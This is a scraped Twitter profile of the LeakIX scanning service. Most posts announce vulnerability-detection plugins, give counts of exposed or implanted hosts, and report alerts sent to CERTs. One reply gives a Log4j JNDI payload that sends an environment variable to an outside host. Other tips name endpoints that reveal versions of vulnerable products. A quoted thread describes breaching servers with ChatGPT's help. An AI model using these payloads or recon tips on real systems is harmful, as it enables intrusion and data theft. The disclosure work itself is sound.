LeakIX Profile Banner
LeakIX Profile
LeakIX

@leak_ix

Followers
4,744
Following
220
Media
266
Statuses
1,339

Maintaining and reporting for LeakIX.

Joined July 2020
Don't wanna be here? Send us removal request.
Explore trending content on Musk Viewer
Pinned Tweet
@leak_ix
LeakIX
3 months
🚨 Detection for Check Point Gateway's CVE-2024-24919 has been improved. ~8500 vulnerable gateway found. Hosting providers & CERTs have been notified, patch now! Credits: @watchtowrcyber Thanks: @Gi7w0rm @Chocapikk_
Tweet media one
@leak_ix
LeakIX
3 months
🚨 New plugin for Check Point Gateway indexing hosts vulnerable to CVE-2024-24919. ~2400 vulnerable hosts found. Hosting providers & CERTs have been notified, patch now! Credits: @watchtowrcyber
Tweet media one
0
3
8
3
11
18
@leak_ix
LeakIX
10 months
🚨🚨🚨 Whatever you were thinking about CVE-2023-20198 ( #Cisco IOS EX) it's 100x worst. We used @TalosSecurity IOC check and found ~30k implants. That's 30k devices infected (routers, switches, VPNs), under the control of threat actors. That's excluding rebooted devices.
Tweet media one
17
167
443
@leak_ix
LeakIX
10 months
🚨 Cisco Implant traffic detected from 192.3.101[.]111 . Looking for DNS settings, likely to ID targets.
Tweet media one
6
73
281
@leak_ix
LeakIX
1 year
Fantastic tool by @circl_lu Analyze an URL behavior, redirects and loaded resources, add monitoring alerts ect ...
Tweet media one
3
62
178
@leak_ix
LeakIX
3 years
I guess I should share my #f12 nuclei template. I'm not sure how it works though.
Tweet media one
8
15
121
@leak_ix
LeakIX
1 year
💡If your looking for vulnerable #Citrix #ADC instances, Citrix recently patched their VPN client for CVE-2023-24491 to 23.5.1.3. That's the version included in the latest ADC patch fixing CVE-2023-3466, you can get it from /vpn/pluginlist.xml
Tweet media one
Tweet media two
2
27
95
@leak_ix
LeakIX
10 months
⚠️ Cisco exploit attempts from 38.60.199.10 404 because device is already implanted. it secures the devices against further exploitation. Assuming it might be a new actor since they didn't try to use the implant authentication. cc @SI_FalconTeam @Horizon3Attack
Tweet media one
1
30
87
@leak_ix
LeakIX
10 months
🚨 CVE-2023-34048 - New plugin released for #VMWare #vCenter . Found ~1100 vulnerable public services with DCERPC enabled. Patch now! Out of 1911 vulnerable hosts 1100 are not fire-walled. Alerts have been dispatched to CERTs and hosting providers. Thanks: @Gi7w0rm
Tweet media one
1
26
74
@leak_ix
LeakIX
2 years
Still 25000 DVR solutions running that vulnerable firmware ... LFI for sure, RCE most likely ... Source :
Tweet media one
3
20
72
@leak_ix
LeakIX
11 months
🚨 Watching out for IIS vulnerabilities: Vector: Remote Privileges required: None Of course it would includes Exchange and so on ...
Tweet media one
1
18
67
@leak_ix
LeakIX
1 year
That's just awesome work! Glad we could help and thanks for sharing!
@silentgh00st
Mehdi
1 year
🧵THREAD🧵 How I compromised some servers and downloaded source codes of a company at @Hacker0x01 private program using @leak_ix and @OpenAI ChatGPT
Tweet media one
Tweet media two
15
114
477
1
8
60
@leak_ix
LeakIX
3 years
We now have a plugin for loading and running basic Nuclei's template files ! Don't forget to check out @pdiscoveryio tool and its awesome template community !
Tweet media one
2
14
60
@leak_ix
LeakIX
1 year
Releasing MobileIron Sentry (CVE-2023-38035) information disclosure exploit: Source: @Horizon3Attack -
Tweet media one
0
12
49
@leak_ix
LeakIX
10 months
🔎 In the last episode of the #IOS XE exploit research saga, we find out how they replaced Nginx config files. CVE-2023-20273: IOS XE root privilege escalation and implant installation.
3
20
49
@leak_ix
LeakIX
1 year
🚨CVE-2023-40595 ( and friends ) - New plugin released for finding vulnerable #Splunk Web interfaces with version detection. Found ~12000 vulnerable public instances. Note: @NIST tagged it as no auth required. @splunk tagged it as required. Thanks: @Gi7w0rm
Tweet media one
3
14
51
@leak_ix
LeakIX
1 year
Just out, we added a new API endpoint to help enumerate subdomains for a given domain :
1
16
47
@leak_ix
LeakIX
11 months
📖 Recon tip time : When looking for information on an IP or network, you might often get more detailed and structured information from RDAP instead of WHOIS. Eg:
0
9
47
@leak_ix
LeakIX
11 months
🚨 CVE-2023-22515 - Plugin released for #Confluence 0day. Found ~700 vulnerable public instances. ⚠️ There are also ~3500 instances still vulnerable to CVE-2022-26134 due to a wider range of versions affected. Patch now! Thanks @Gi7w0rm for the ping
Tweet media one
Tweet media two
0
11
42
@leak_ix
LeakIX
10 months
CVE-2023-45498 / CVE-2023-45499, announced yesterday affects #VinChin #VMWare #Backup and enables a remote attacker to achieve remote code execution. Vendor failed to acknowledge the vulnerability. Blog post, IOCs and demo at
Tweet media one
0
17
39
@leak_ix
LeakIX
10 months
🚨🚨🚨 Things are NOT getting better. Today's scan revealed an additional 10k compromised devices, indicating exploitation is still ongoing. This brings the number of implanted #Cisco IOS EX devices to ~37k . Pretty much feels like Thanos could snap his fingers at any time.
Tweet media one
@leak_ix
LeakIX
10 months
🚨🚨🚨 Whatever you were thinking about CVE-2023-20198 ( #Cisco IOS EX) it's 100x worst. We used @TalosSecurity IOC check and found ~30k implants. That's 30k devices infected (routers, switches, VPNs), under the control of threat actors. That's excluding rebooted devices.
Tweet media one
17
167
443
2
11
40
@leak_ix
LeakIX
1 year
CVE-2023-25610
Tweet media one
1
6
37
@leak_ix
LeakIX
3 years
⚠️Well ... Our Grafana plugin sure becomes handy all of a sudden ... ->
@pdnuclei
nuclei
3 years
New - Grafana unauthorized arbitrary file read Template: by z0ne, dhiyaneshDk Reference: #bugbounty #pentest #appsec
Tweet media one
2
181
559
0
9
30
@leak_ix
LeakIX
1 year
⚠️ New plugin released for finding vulnerable Citrix ADC. ~16k found, ~50% have been patched. Cloud images are a mess and some customers currently cannot update because Citrix only updated the BYOL versions. Hosting providers and national CERTs have been notified.
Tweet media one
0
7
32
@leak_ix
LeakIX
11 months
🚨 CVE-2023-42793 - New plugin released for #TeamCity authentication bypass. Found ~950 vulnerable public instances. Patch now! The vulnerability allows for full take-over of the server and code execution. Credits: @SonarSource
Tweet media one
1
12
30
@leak_ix
LeakIX
1 year
As usual we went the extra step to scan for CVE-2023-27532 ( #Veeam ). We believe that the vulnerability could also be exploited to achieve RCE (BinaryFormatter). Every hosting provider and national CERTs is currently being sent the list of vulnerable assets in their scope.
Tweet media one
1
6
27
@leak_ix
LeakIX
11 months
🚨 CVE-2023-40044 - New plugin released for #WSFTP RCE. Found ~250 vulnerable public instances. Patch now! Alerts have been dispatched to CERTs and hosting providers. Credits: @assetnote @MCKSysAr Thanks: @Gi7w0rm
Tweet media one
1
15
28
@leak_ix
LeakIX
10 months
🚨 New plugin for SysAid On-Prem indexing hosts vulnerable to CVE-2023-47246. 163 hosts found running a version older than 23.3.36 Hosting providers & CERTs have been notified. Patch now!
Tweet media one
@Gi7w0rm
Gi7w0rm
10 months
New #ZeroDay abused by #Cl0p #ransomware affiliate! #CVE -2023-47246 is a Path Traversal vulnerability in #SysAid On-Prem software leading to code execution. In the observed case it was abused to deploy a #Webshell on the affected system.
2
36
103
1
12
26
@leak_ix
LeakIX
10 months
🔍 Added IOS XE implant V3 detection on the platform. Here's the current distribution of implant versions per country.
Tweet media one
0
7
27
@leak_ix
LeakIX
1 year
💡If you're looking for precise version information on #Ivanti MobileIron Core aka EPMM without disclosing the 0day, you can get it from: /mifs/c/windows/api/v2/device/registration head > script > src attribute Looks like someone mixed 2 template variables.
Tweet media one
1
11
24
@leak_ix
LeakIX
1 year
🚨 CVE-2023-39143 - New plugin released for finding vulnerable PaperCut instances. ~1.7k found, ~15% have been patched. Hosting providers and national CERTs have been notified. Source: @Horizon3Attack -
Tweet media one
0
8
23
@leak_ix
LeakIX
1 year
We analyzed CVE-2023-34039 - VMWare Aria Operations SSH auth bypass : - Auth is possible with a fixed private key - Key is version dependent - Host key is the same for ALL version Host key : SHA256:tpcfUoQB+n2Wf6tDNm/YPA7DSwwzFjx3B7cnRC2apZ0 Credit @rootxharsh @iamnoooob 1/2
Tweet media one
1
3
23
@leak_ix
LeakIX
10 months
⚠️ Citrix has taken drastic measures to secure its ADC products. From now on the `Last-Modified` headers of public web files are updated every restart. 🤡
7
10
21
@leak_ix
LeakIX
3 years
Done with the Log4j plugin. Our method ensures we're tracking the source server we made the request to. This means a 404 on a random server, can trigger a reply from a logging server in Amazon. ping @CristiVlad25 Available to trusted users only.
Tweet media one
0
1
23
@leak_ix
LeakIX
9 months
⚠️⚠️ [PROBLEMTYPE] in [PRODUCT] is quite a [SEVERITY] issue. We found [EVENTCOUNT] services affected. Everybody was sent no alerts whatsoever.
@CVEnew
CVE
9 months
CVE-2023-38363 [PROBLEMTYPE] in [COMPONENT] in [VENDOR] [PRODUCT] [VERSION] on [PLATFORMS] allows [ATTACKER] to [IMPACT] via [VECTOR]
9
39
145
2
0
21
@leak_ix
LeakIX
2 years
Our technical overview of what happened with the China Leak Default Cloud Security settings must not be trusted
0
6
19
@leak_ix
LeakIX
3 years
In 2021, you opened 573 reports, fixed 135, most of them critical! Thanks to all our researchers, thanks for trusting us, let's make 2022 the year we prove there's a place for un-scoped research ! Special thanks to @HaboubiAnis @CristiVlad25 @dwillems42
Tweet media one
0
2
19
@leak_ix
LeakIX
11 months
🚨 CVE-2023-29357 - New plugin released for #SharePoint 2019 authentication bypass. Found ~200 vulnerable public instances. The vulnerability allows for full take-over, document exfiltration and more. Credits: @starlabs_sg , @Chocapikk_ Thanks: @Gi7w0rm
Tweet media one
0
7
20
@leak_ix
LeakIX
1 year
Finally releasing our new file indexing and search project. We integrated #ClamAV and #Yara scanning and are archiving suspicious files we come across. We also look into compressed files.
Tweet media one
Tweet media two
0
6
20
@leak_ix
LeakIX
2 years
Working on a new project 😶 hxxp://157.230.104.109/ -> infected files and powershell cc @vxunderground
Tweet media one
3
1
20
@leak_ix
LeakIX
3 years
@_StaticFlow_ Use ${jndi:ldaps://${env:user}.xyz.collab.com/a} and get direct connections with the hostname inside the TLS handshake you just initiated.
0
4
18
@leak_ix
LeakIX
1 year
⚠️ 5 days ago @CISA added CVE-2023-27532, to their known exploited vulnerabilities list. It impacts Veeam and can lead to full infrastructure compromise including backups and server credentials. There are still ~200 vulnerable instances currently online, 90% have been patched.
Tweet media one
0
7
19
@leak_ix
LeakIX
2 years
A quick first look at open Consul servers : 1800, not so bad.
Tweet media one
0
5
18
@leak_ix
LeakIX
1 year
Current #Citrix #ADC patching state: ~5000 hosts fixed since yesterday, around 30%
Tweet media one
0
0
18
@leak_ix
LeakIX
1 year
Suspect activity since September 2022: More than 4M free domain names have been registered and are displaying single page content related to FUDing BTC, social networks and sexual orientation. Impacted domains : ga, tk, cf
Tweet media one
3
1
18
@leak_ix
LeakIX
10 months
It has been brought to our attention that the product name is IOS XE and not IOS EX. It's really too bad because the filenames were pretty sexy to work with 🤷 ( It's been a long night )
Tweet media one
1
1
18
@leak_ix
LeakIX
2 years
Yes, Kafka servers are also left open without authentication. And it's as bad as open databases :
Tweet media one
0
2
15
@leak_ix
LeakIX
1 year
New side project for education purposes, scam call transcripts:
Tweet media one
0
1
15
@leak_ix
LeakIX
2 years
Yearly reminder
@reybango
Rey Bango 🇺🇦🌻
2 years
Still my favorite sticker. 😈
Tweet media one
18
254
1K
1
3
15
@leak_ix
LeakIX
2 years
Tweet media one
1
0
16
@leak_ix
LeakIX
1 year
We built LeakIX on personal money with a severance package received from COVID, already sending free alerts to CERTs. We refused external interference, multiple times, losing money and eating junk for 6 months. @dwillems42 then joined and we started profiting. 1/2
@malwrhunterteam
MalwareHunterTeam
1 year
1st: Fuck every single people giving even just $1 to Cyble. 2nd: Fuck @TechCrunch for writing an article about that & saying not a single word about what kind of piece of shit company Cyble is. 3rd: fuck Cyble, as usual. 😫😫😫 cc @idclickthat @Iamdeadlyz @ULTRAFRAUD @JAMESWT_MHT
Tweet media one
5
4
35
1
2
14
@leak_ix
LeakIX
1 year
Huge shout out to @Chocapikk_ , @CristiVlad25 and @Gi7w0rm . Over 1 week they have identified and sent personalized reports to a 105 companies and institutions on #MobileIron , #SharePoint , #Metabase and #Citrix ADC. You guys are awesome and we're honored to have you on board !
Tweet media one
2
0
14
@leak_ix
LeakIX
9 months
🔍Some light on the vulnerability: - ~6000 VCD found - Any password will allow authentication as root - The appliance management web interface is exposed on ~22 hosts - SSH is enabled on ~84 hosts, we weren't able to bypass auth on those. In total 6 hosts were found vulnerable.
@BleepinComputer
BleepingComputer
9 months
VMWare discloses critical VCD Appliance auth bypass with no patch - @serghei
3
39
100
0
3
14
@leak_ix
LeakIX
1 year
🚨 CVE-2023-38646 - New plugin released for finding vulnerable #Metabase instances. ~10k found, ~50% have been patched. Hosting providers and national CERTs have been notified.
Tweet media one
0
3
15
@leak_ix
LeakIX
10 months
⚠️ Just a friendly reminder to update your #Citrix #ADC instances. As of today, there are still ~14k public instances running a firmware older than September 2023 and potentially vulnerable to CVE-2023-4966.
Tweet media one
0
0
15
@leak_ix
LeakIX
1 year
Today we are free from control, we don't have anyone to report to and look good to, except the community. Our values will always stay the same. The junk eating too.
0
0
14
@leak_ix
LeakIX
1 year
We just added support for CVE-2018-9995. ~2000 DVR are accessible and vulnerable to credentials disclosure. Thanks to @Remzi96 for the suggestion !
Tweet media one
Tweet media two
1
5
14
@leak_ix
LeakIX
2 years
Totally agree, it was awesome to be in a conf about real tech that wasn't business oriented ❤️. Thanks for having us! We're definitely convinced to start contributing to @MISPProject !
@cudeso
Koen Van Impe ☕
2 years
Thank you @MISPProject and @circl_lu for organising the #CTISummit #CTIS2022 conference. Interesting talks and meeting a lot of nice people. I enjoyed the new format a lot!
0
5
22
0
3
14
@leak_ix
LeakIX
1 year
It's the most difficult part about off-scope bug hunting, and trust us, it breaks our hearts to see good deeds being ignored. Thousands of easy high-value targets are found every day, we're not doing rocket-science here. 1/3
@Gi7w0rm
Gi7w0rm
1 year
107 reports sent for critical vulnerabilities since last month. 65 fixed. Sent several reports aside that are not registered by the platform. Want to know how many I heard back from ? 3 in total. Ungrateful work 😮‍💨 cc: @leak_ix
Tweet media one
4
2
30
3
4
14
@leak_ix
LeakIX
1 year
🚨CVE-2023-34124 ( and friends ) - New plugin released for finding vulnerable #SonicWall GMS instances. Found ~100 vulnerable public instances. Hosting providers and national CERTs have been notified. Sources: @rapid7 - Thanks: @Gi7w0rm
Tweet media one
0
5
13
@leak_ix
LeakIX
2 years
If you're looking for hosting in Europe > go @Hetzner_Online those guys are just wonderful. 💕
3
1
13
@leak_ix
LeakIX
1 year
Microsoft patches of interest: - MSMQ is back (RCE): CVE-2023-32057, CVE-2023-32045, CVE-2023-32044, CVE-2023-35309 - SharePoint (RCE): CVE-2023-33134, CVE-2023-33157, CVE-2023-33159, CVE-2023-33160, CVE-2023-33165 - RRAS (RCE): CVE-2023-35366, CVE-2023-35367
0
4
13
@leak_ix
LeakIX
1 year
🚨 CVE-2023-35082 - Plugin updated for finding vulnerable MobileIron Core instances taking into account the recent developments affecting versions higher than 11.2. ~1.3k found, Hosting providers and national CERTs have been notified. Source @rapid7 and MobileIron KB
Tweet media one
2
3
13
@leak_ix
LeakIX
1 year
⚠️ Remember Zimbra's CVE-2022-27925 ? We have indicators showing threat actors are using the vulnerability to access user mailboxes. They are then sending various scams to every email they can find in the system.
0
5
13
@leak_ix
LeakIX
1 year
🚨 New plugin in town, we added detection for #SharePoint 2019 versions covering : CVE-2023-33134 CVE-2023-33157 CVE-2023-33159 CVE-2023-33160 CVE-2023-33165. Alerts have been sent to participating CERTs and network providers.
Tweet media one
0
3
11
@leak_ix
LeakIX
2 years
Tagged all the confluence server >= 7.4 Results are now public here :
Tweet media one
0
4
11
@leak_ix
LeakIX
1 year
🚨 CVE-2023-35885 - New plugin released for finding vulnerable CloudPanel instances. ~57k found, ~70% have been patched. Hosting providers and national CERTs have been notified. Source :
Tweet media one
0
6
12
@leak_ix
LeakIX
1 year
@DailyOsint Damn, we launched the same this week but added virus and Yara scan:
2
2
11
@leak_ix
LeakIX
1 year
Ivanti Endpoint Manager Mobile - CVE-2023-35078 exploit is now public.
@pdnuclei
nuclei
1 year
Scan for Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass (CVE-2023-35078) using nuclei templates. Nuclei Template - CISA Advisory - nuclei -id CVE-2023-35078 -list urls
Tweet media one
1
69
245
0
4
12
@leak_ix
LeakIX
3 years
Don't want to start Friday lost in results pages ? Go explore Internet in our graph explorer ! 👉 📘 Delivered on schedule, preview free for everyone !
1
3
12
@leak_ix
LeakIX
1 year
Upcoming change: Starting tomorrow our API will be available to authenticated users only. Update your tooling !
0
2
11
@leak_ix
LeakIX
2 years
@GossiTheDog Aaaand it's gone
0
0
1
@leak_ix
LeakIX
1 year
💡If you're looking for vulnerable #Metabase instances, you can get the version number from /api/session/properties .
Tweet media one
1
1
11
@leak_ix
LeakIX
1 year
🚨 CVE-2023-35078 - New plugin released for finding vulnerable #Ivanti MobileIron Core instances. ~3k found, ~40% have been patched. Hosting providers and national CERTs have been notified.
Tweet media one
0
6
10
@leak_ix
LeakIX
2 years
Current Forti* CVE-2022-40684 exposure : Credits @Horizon3Attack for the payload.
Tweet media one
3
6
11
@leak_ix
LeakIX
1 year
🚨 CVE-2023-39848 - This is no laughing matter and should be taken seriously. ~999,999,999 found, 0% patched as the vendor is not releasing a new version and merely suggests a̵n̵ ̵R̵P̵M̵ ̵f̵i̵x̵. nothing. Secret services have been notified.
Tweet media one
@HunterMapping
Hunter
1 year
🙅Rejected🙅‍♂️ CVE-2023-39848 Feel free to laugh out loud 🤣🤣🤣, unless your instances are exposed 👀 🧷 Dork 👇👇👇 "Damn Vulnerable Web Application (DVWA)" #infosec #infosys #BugBounty
Tweet media one
2
6
9
2
6
11
@leak_ix
LeakIX
2 years
After the brilliant talk by @PatriceAuffret from @Onyphe at CTI-Summit, we decided to join the movement and follow the 10 Commandments for Ethical Internet Scanning. More info on our probe network at
0
2
11
@leak_ix
LeakIX
1 year
Check our new open source #WordPress #scanner WpFinger :
0
1
11
@leak_ix
LeakIX
10 months
@ACEResponder Always use io.LimitReader on untrusted inputs, apply proper ctx and tcp deadlines.
0
0
11
@leak_ix
LeakIX
1 year
Starting today we are changing our scanning methodology. Vulnerabilities will be re-scanned every day to avoid confusion on older results. Our plans will be adapted next month to allow searching on older/patched vulnerabilities. Current subscriptions will not be affected.
0
1
11
@leak_ix
LeakIX
1 year
🤷Ivanti MobileIron Core strikes back : CVE-2023-35081 - Remote Arbitrary File Write We are seeing 3 new version being deployed : 11.10.0.3, 11.9.1.2 and 11.8.1.2
1
3
10
@leak_ix
LeakIX
1 year
Do you need to integrate our platform in your own solution ? The hook documentation is out !
0
0
8
@leak_ix
LeakIX
10 months
🚨 New plugin for Apache ActiveMQ is up! Still ~2900 vulnerable instances running on standard ports. CVE-2023-46604 is currently exploited in the wild.
Tweet media one
@Shadowserver
The Shadowserver Foundation
10 months
We are scanning & reporting out Apache ActiveMQ instances vulnerable to CVE-2023-46604, a deserialization of untrusted data RCE. 3329 vulnerable brokers found out of 7249 accessible (2023-10-30). Data in new daily Accessible ActiveMQ Service report:
Tweet media one
1
4
6
1
2
10
@leak_ix
LeakIX
1 year
🙏 Another appliance saved from disaster. Feels good to read positive feedback from our prevention program. We'll always do our part and keep network admins in the loop for free about critical issues.
0
1
10
@leak_ix
LeakIX
10 months
If you are a pro user and use the bulk export, you can now use the Python client to do the same. We have just released a new version of the client, `0.1.8`. See . It also includes some fixes in the library l9format, making some fields optional. Enjoy!
2
3
10
@leak_ix
LeakIX
1 year
New POC project 🤔 What's your general experience with other Wordpress scanning projects ?
Tweet media one
2
1
9
@leak_ix
LeakIX
10 months
Did any honeypot folks catch this ? cc @SI_FalconTeam @r4shimo
@onyphe
ONYPHE
10 months
🚨BREAKING🚨 #Cisco #CVE_2023_20198 implants version 2 have disappeared. We went down from ~31K implanted devices to 400 devicesin less that 24 hours.
Tweet media one
0
12
22
2
4
10
@leak_ix
LeakIX
4 years
We've been silent this week, but we come back with a big update :)
Tweet media one
Tweet media two
Tweet media three
1
0
10
@leak_ix
LeakIX
1 year
There's an AI out there faking HTTP responses depending on the URL you query 🤣
Tweet media one
2
1
9
@leak_ix
LeakIX
4 years
This bot is currently crawling the internet for open #Laravel debuggers and storing API keys :
0
4
9
@leak_ix
LeakIX
2 years
Twitter is now the Mastodon user directory.
0
2
9
@leak_ix
LeakIX
4 years
We're now scanning and indexing #IPv6 as well
Tweet media one
1
2
9
@leak_ix
LeakIX
1 year
⚠️ CVE-2023-35082 - Only ~200 patched since. Ivanti communication has been confusing: - No new version has been released to address the updated issue - People are assuming they're running the last version - No new CVE was issued for a different vulnerability
Tweet media one
@leak_ix
LeakIX
1 year
🚨 CVE-2023-35082 - Plugin updated for finding vulnerable MobileIron Core instances taking into account the recent developments affecting versions higher than 11.2. ~1.3k found, Hosting providers and national CERTs have been notified. Source @rapid7 and MobileIron KB
Tweet media one
2
3
13
1
5
9
@leak_ix
LeakIX
3 years
We've tried to get further on this. If anyone ( any country ) has deployed the application from it's offical docker image, the endpoint for issuing CERTs was exposed without authentication.
@phretor
Federico Maggi
3 years
[THREAD] One of the (main?) reasons why we keep seeing exposed services, like the DGCI web frontend which led to the whole mess we witnessed today, is because people just trust Docker Compose files and don't understand the simplest of all options: port forwarding. [1/N]
Tweet media one
2
11
39
0
4
9
@leak_ix
LeakIX
1 year
New design is out! Time to embrace our cyber-punk side and bring some colors into life!
1
1
8
@leak_ix
LeakIX
1 year
📖 You have all been asking for it! The documentation is finally here! Including query syntax, all the fields and a dork library. 👉
0
2
8
@leak_ix
LeakIX
2 years
FFS, please stop making HackerOne your only security contact point.
Tweet media one
4
0
6